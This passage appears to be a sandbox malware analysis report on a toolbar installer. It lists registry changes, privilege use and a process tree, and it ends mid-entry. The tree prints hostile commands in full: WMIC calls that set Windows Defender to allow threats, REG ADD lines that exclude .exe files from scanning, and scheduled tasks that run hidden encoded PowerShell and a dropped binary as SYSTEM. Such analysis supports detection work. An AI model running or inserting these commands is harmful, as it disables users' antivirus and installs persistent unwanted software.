Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\kZGDpsH.exe"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "muVCVUSRFKgBfVwebaH[()(_mNyf{gjxSdMF"	hpXbguT.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exehpXbguT.exe

pid	process
2872	powershell.exe
2872	powershell.exe
2872	powershell.exe
3704	powershell.exe
3704	powershell.exe
3704	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2872	powershell.EXE
2872	powershell.EXE
2872	powershell.EXE
1828	powershell.exe
1828	powershell.exe
1828	powershell.exe
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe
680	powershell.exe
680	powershell.exe
680	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
496	powershell.exe
496	powershell.exe
496	powershell.exe
2260	powershell.EXE
2260	powershell.EXE
2260	powershell.EXE
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
2320	powershell.exe
2320	powershell.exe
2320	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe
3696	hpXbguT.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3376	WMIC.exe
Token: SeSecurityPrivilege	3376	WMIC.exe
Token: SeTakeOwnershipPrivilege	3376	WMIC.exe
Token: SeLoadDriverPrivilege	3376	WMIC.exe
Token: SeSystemProfilePrivilege	3376	WMIC.exe
Token: SeSystemtimePrivilege	3376	WMIC.exe
Token: SeProfSingleProcessPrivilege	3376	WMIC.exe
Token: SeIncBasePriorityPrivilege	3376	WMIC.exe
Token: SeCreatePagefilePrivilege	3376	WMIC.exe
Token: SeBackupPrivilege	3376	WMIC.exe
Token: SeRestorePrivilege	3376	WMIC.exe
Token: SeShutdownPrivilege	3376	WMIC.exe
Token: SeDebugPrivilege	3376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3376	WMIC.exe
Token: SeRemoteShutdownPrivilege	3376	WMIC.exe
Token: SeUndockPrivilege	3376	WMIC.exe
Token: SeManageVolumePrivilege	3376	WMIC.exe
Token: 33	3376	WMIC.exe
Token: 34	3376	WMIC.exe
Token: 35	3376	WMIC.exe
Token: 36	3376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3376	WMIC.exe
Token: SeSecurityPrivilege	3376	WMIC.exe
Token: SeTakeOwnershipPrivilege	3376	WMIC.exe
Token: SeLoadDriverPrivilege	3376	WMIC.exe
Token: SeSystemProfilePrivilege	3376	WMIC.exe
Token: SeSystemtimePrivilege	3376	WMIC.exe
Token: SeProfSingleProcessPrivilege	3376	WMIC.exe
Token: SeIncBasePriorityPrivilege	3376	WMIC.exe
Token: SeCreatePagefilePrivilege	3376	WMIC.exe
Token: SeBackupPrivilege	3376	WMIC.exe
Token: SeRestorePrivilege	3376	WMIC.exe
Token: SeShutdownPrivilege	3376	WMIC.exe
Token: SeDebugPrivilege	3376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3376	WMIC.exe
Token: SeRemoteShutdownPrivilege	3376	WMIC.exe
Token: SeUndockPrivilege	3376	WMIC.exe
Token: SeManageVolumePrivilege	3376	WMIC.exe
Token: 33	3376	WMIC.exe
Token: 34	3376	WMIC.exe
Token: 35	3376	WMIC.exe
Token: 36	3376	WMIC.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeIncreaseQuotaPrivilege	3032	WMIC.exe
Token: SeSecurityPrivilege	3032	WMIC.exe
Token: SeTakeOwnershipPrivilege	3032	WMIC.exe
Token: SeLoadDriverPrivilege	3032	WMIC.exe
Token: SeSystemProfilePrivilege	3032	WMIC.exe
Token: SeSystemtimePrivilege	3032	WMIC.exe
Token: SeProfSingleProcessPrivilege	3032	WMIC.exe
Token: SeIncBasePriorityPrivilege	3032	WMIC.exe
Token: SeCreatePagefilePrivilege	3032	WMIC.exe
Token: SeBackupPrivilege	3032	WMIC.exe
Token: SeRestorePrivilege	3032	WMIC.exe
Token: SeShutdownPrivilege	3032	WMIC.exe
Token: SeDebugPrivilege	3032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3032	WMIC.exe
Token: SeRemoteShutdownPrivilege	3032	WMIC.exe
Token: SeUndockPrivilege	3032	WMIC.exe
Token: SeManageVolumePrivilege	3032	WMIC.exe
Token: 33	3032	WMIC.exe
Token: 34	3032	WMIC.exe
Token: 35	3032	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1ef565125b92bec9766369c997694ad2.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.EXE

description	pid	process	target process
PID 748 wrote to memory of 364	748	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 748 wrote to memory of 364	748	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 748 wrote to memory of 364	748	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 364 wrote to memory of 2192	364	SimplInst.exe	SimplInst.exe
PID 364 wrote to memory of 2192	364	SimplInst.exe	SimplInst.exe
PID 364 wrote to memory of 2192	364	SimplInst.exe	SimplInst.exe
PID 2192 wrote to memory of 2344	2192	SimplInst.exe	cmd.exe
PID 2192 wrote to memory of 2344	2192	SimplInst.exe	cmd.exe
PID 2192 wrote to memory of 2344	2192	SimplInst.exe	cmd.exe
PID 2344 wrote to memory of 2780	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 2780	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 2780	2344	cmd.exe	forfiles.exe
PID 2780 wrote to memory of 2844	2780	forfiles.exe	cmd.exe
PID 2780 wrote to memory of 2844	2780	forfiles.exe	cmd.exe
PID 2780 wrote to memory of 2844	2780	forfiles.exe	cmd.exe
PID 2844 wrote to memory of 2872	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 2872	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 2872	2844	cmd.exe	powershell.exe
PID 2872 wrote to memory of 3376	2872	powershell.exe	WMIC.exe
PID 2872 wrote to memory of 3376	2872	powershell.exe	WMIC.exe
PID 2872 wrote to memory of 3376	2872	powershell.exe	WMIC.exe
PID 2344 wrote to memory of 584	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 584	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 584	2344	cmd.exe	forfiles.exe
PID 584 wrote to memory of 2064	584	forfiles.exe	cmd.exe
PID 584 wrote to memory of 2064	584	forfiles.exe	cmd.exe
PID 584 wrote to memory of 2064	584	forfiles.exe	cmd.exe
PID 2064 wrote to memory of 3704	2064	cmd.exe	powershell.exe
PID 2064 wrote to memory of 3704	2064	cmd.exe	powershell.exe
PID 2064 wrote to memory of 3704	2064	cmd.exe	powershell.exe
PID 3704 wrote to memory of 3032	3704	powershell.exe	WMIC.exe
PID 3704 wrote to memory of 3032	3704	powershell.exe	WMIC.exe
PID 3704 wrote to memory of 3032	3704	powershell.exe	WMIC.exe
PID 2344 wrote to memory of 4092	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 4092	2344	cmd.exe	forfiles.exe
PID 2344 wrote to memory of 4092	2344	cmd.exe	forfiles.exe
PID 4092 wrote to memory of 3584	4092	forfiles.exe	cmd.exe
PID 4092 wrote to memory of 3584	4092	forfiles.exe	cmd.exe
PID 4092 wrote to memory of 3584	4092	forfiles.exe	cmd.exe
PID 3584 wrote to memory of 2844	3584	cmd.exe	powershell.exe
PID 3584 wrote to memory of 2844	3584	cmd.exe	powershell.exe
PID 3584 wrote to memory of 2844	3584	cmd.exe	powershell.exe
PID 2844 wrote to memory of 3032	2844	powershell.exe	WMIC.exe
PID 2844 wrote to memory of 3032	2844	powershell.exe	WMIC.exe
PID 2844 wrote to memory of 3032	2844	powershell.exe	WMIC.exe
PID 2192 wrote to memory of 3896	2192	SimplInst.exe	forfiles.exe
PID 2192 wrote to memory of 3896	2192	SimplInst.exe	forfiles.exe
PID 2192 wrote to memory of 3896	2192	SimplInst.exe	forfiles.exe
PID 3896 wrote to memory of 188	3896	forfiles.exe	cmd.exe
PID 3896 wrote to memory of 188	3896	forfiles.exe	cmd.exe
PID 3896 wrote to memory of 188	3896	forfiles.exe	cmd.exe
PID 188 wrote to memory of 3888	188	cmd.exe	reg.exe
PID 188 wrote to memory of 3888	188	cmd.exe	reg.exe
PID 188 wrote to memory of 3888	188	cmd.exe	reg.exe
PID 188 wrote to memory of 3892	188	cmd.exe	reg.exe
PID 188 wrote to memory of 3892	188	cmd.exe	reg.exe
PID 188 wrote to memory of 3892	188	cmd.exe	reg.exe
PID 2192 wrote to memory of 3032	2192	SimplInst.exe	schtasks.exe
PID 2192 wrote to memory of 3032	2192	SimplInst.exe	schtasks.exe
PID 2192 wrote to memory of 3032	2192	SimplInst.exe	schtasks.exe
PID 2192 wrote to memory of 1936	2192	SimplInst.exe	schtasks.exe
PID 2192 wrote to memory of 1936	2192	SimplInst.exe	schtasks.exe
PID 2192 wrote to memory of 1936	2192	SimplInst.exe	schtasks.exe
PID 2872 wrote to memory of 3896	2872	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\1ef565125b92bec9766369c997694ad2.exe
"C:\Users\Admin\AppData\Local\Temp\1ef565125b92bec9766369c997694ad2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Users\Admin\AppData\Local\Temp\7zS1003.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:364

C:\Users\Admin\AppData\Local\Temp\7zS138D.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3376

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:3032

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:188

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:3888

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3892

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gExogpbsk" /SC once /ST 00:38:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:3032

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gExogpbsk"
4⤵
PID:1936

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gExogpbsk"
4⤵
PID:3584

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 07:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\yayTXvm.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2844

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\yayTXvm.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\yayTXvm.exe nv /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2072

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3884

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1828

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2488

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:188

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
